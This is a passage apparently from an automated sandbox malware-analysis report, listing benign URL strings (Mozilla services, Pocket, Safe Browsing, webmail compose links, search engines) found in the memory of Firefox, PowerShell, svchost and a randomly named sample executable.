                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsFea
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com
                      Source: firefox.exe, 00000034.00000002.2038405928.00002736B3E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/
                      Source: firefox.exe, 00000034.00000002.2038405928.00002736B3E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/Z
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
                      Source: firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
                      Source: firefox.exe, 00000034.00000002.2023047456.000001F9201B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Populating
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fpn.firefox.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
                      Source: svchost.exe, 00000015.00000003.1203494684.000002CF0F931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 00000015.00000003.1203494684.000002CF0F8C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.cdn.mozilla.net/
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getpocket.com/recommendations
                      Source: firefox.exe, 00000034.00000002.2021063771.000001F91FF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D8022B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                      Source: firefox.exe, 00000034.00000003.1956668985.000001F922A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1957376931.000001F922A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958286370.000001F922A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1956268965.000001F922800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mozilla-services/screenshots
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/systemManufacturer.json/shims/google-
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025642731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.956232423.0000024D80C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881setupChr
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://ideas.mozilla.org/
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://incoming.telemetry.mozilla.org
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://install.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                      Source: firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2021063771.000001F91FF20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%ssetSlowScriptDebugHandler/debugService.activationH
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.inbox.lv/compose?to=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912DDC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://mitmdetection.services.mozilla.com/
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://monitor.firefox.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://monitor.firefox.com/about
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://monitor.firefox.com/breach-details/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://monitor.firefox.com/user/dashboard
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/preferences
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
                      Source: powershell.exe, 0000000C.00000002.970405411.0000025651CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.970405411.0000025651B6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.941241266.00000256434CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D901AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://oauth.accounts.firefox.com/v1
                      Source: firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sisDefault
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjshttp://compose.mail.ya
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F92125B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.comDEVTOOLS_POLICY_DISABLED_PREFdevtools-commandkey-inspectordevtools-comma
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.comdnsResolveFullyQualifiedNamestryKeywordFixupForURIInfoPrevent
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                      Source: firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com//shims/google-safeframe.html
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com//shims/google-safeframe.html/shims/mochitest-shim-1.jsexperiments/sc
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
